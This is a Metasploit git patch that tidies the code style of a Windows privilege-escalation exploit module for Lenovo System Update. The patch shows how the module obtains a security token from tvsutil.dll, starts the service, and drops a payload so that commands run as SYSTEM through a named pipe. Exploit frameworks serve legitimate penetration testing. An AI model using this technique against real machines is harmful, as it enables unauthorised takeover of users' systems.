From 3aa1ffb4f5cd958801a3229f890b15b0ea983bb0 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 22 May 2015 16:20:36 -0500 Subject: [PATCH] Do minor code cleanup --- .../windows/local/lenovo_systemupdate.rb | 52 +++++++++---------- 1 file changed, 26 insertions(+), 26 deletions(-) diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb index 2cf93270f4..732c7deb5e 100644 --- a/modules/exploits/windows/local/lenovo_systemupdate.rb +++ b/modules/exploits/windows/local/lenovo_systemupdate.rb @@ -4,32 +4,31 @@ ## class Metasploit3 < Msf::Exploit::Local - Rank = ExcellentRanking - include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper include Msf::Post::Windows::Priv include Msf::Post::Windows::Services + Rank = ExcellentRanking + def initialize(info={}) super(update_info(info, { 'Name' => 'Lenovo System Update Privilege Escalation', 'Description' => %q{ - The named pipe, \SUPipeServer, can be accessed by normal users to interact - with the System update service. The service provides the possibility to execute - arbitrary commands as SYSTEM if a valid security token is provided. This token can - be generated by calling the GetSystemInfoData function in the DLL tvsutil.dll - - Please note that the System Update is stopped by default but can be started/stopped calling - the Executable ConfigService.exe + The named pipe, \SUPipeServer, can be accessed by normal users to interact with the + System update service. The service provides the possibility to execute arbitrary + commands as SYSTEM if a valid security token is provided. This token can be generated + by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the + System Update is stopped by default but can be started/stopped calling the Executable + ConfigService.exe. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Micahel Milvich', # vulnerability discovery, advisory - 'Sofiane Talmat', # vulnerability discovery, advisory - 'h0ng10' # Metasploit module + 'Micahel Milvich', # vulnerability discovery, advisory + 'Sofiane Talmat', # vulnerability discovery, advisory + 'h0ng10' # Metasploit module ], 'Arch' => ARCH_X86, 'Platform' => 'win', @@ -118,13 +117,14 @@ class Metasploit3 < Msf::Exploit::Local def get_security_token(lenovo_directory) - if not client.railgun.get_dll('tvsutil') then + unless client.railgun.get_dll('tvsutil') client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll") - client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl") + client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl') end dll_response = client.railgun.tvsutil.GetSystemInfoData(256) - return dll_response['systeminfo'][0,40] + + dll_response['systeminfo'][0,40] end @@ -139,23 +139,23 @@ class Metasploit3 < Msf::Exploit::Local end su_directory = service_info('SUService')[:path][1..-16] - print_status("Starting service via ConfigService.exe") - config_service(su_directory, "start") - print_status("Giving the service some time to start...") - sleep(datastore['sleep']) + print_status('Starting service via ConfigService.exe') + config_service(su_directory, 'start') + + print_status('Giving the service some time to start...') + Rex.sleep(datastore['Sleep']) print_status("Getting security token...") token = get_security_token(su_directory) vprint_good("Security token is: #{token}") - - if datastore['WritableDir'] and not datastore['WritableDir'].empty? - temp_dir = datastore['WritableDir'] - else + if datastore['WritableDir'].nil? || datastore['WritableDir'].empty? temp_dir = get_env('TEMP') + else + temp_dir = datastore['WritableDir'] end - print_status("Using #{temp_dir} to drop malicious exe") + print_status("Using #{temp_dir} to drop the payload") begin cd(temp_dir) @@ -186,8 +186,8 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::Unknown, 'Failed to write to pipe') end - print_status("Stopping service via ConfigService.exe") - config_service(su_directory, "stop") + print_status('Stopping service via ConfigService.exe') + config_service(su_directory, 'stop') end end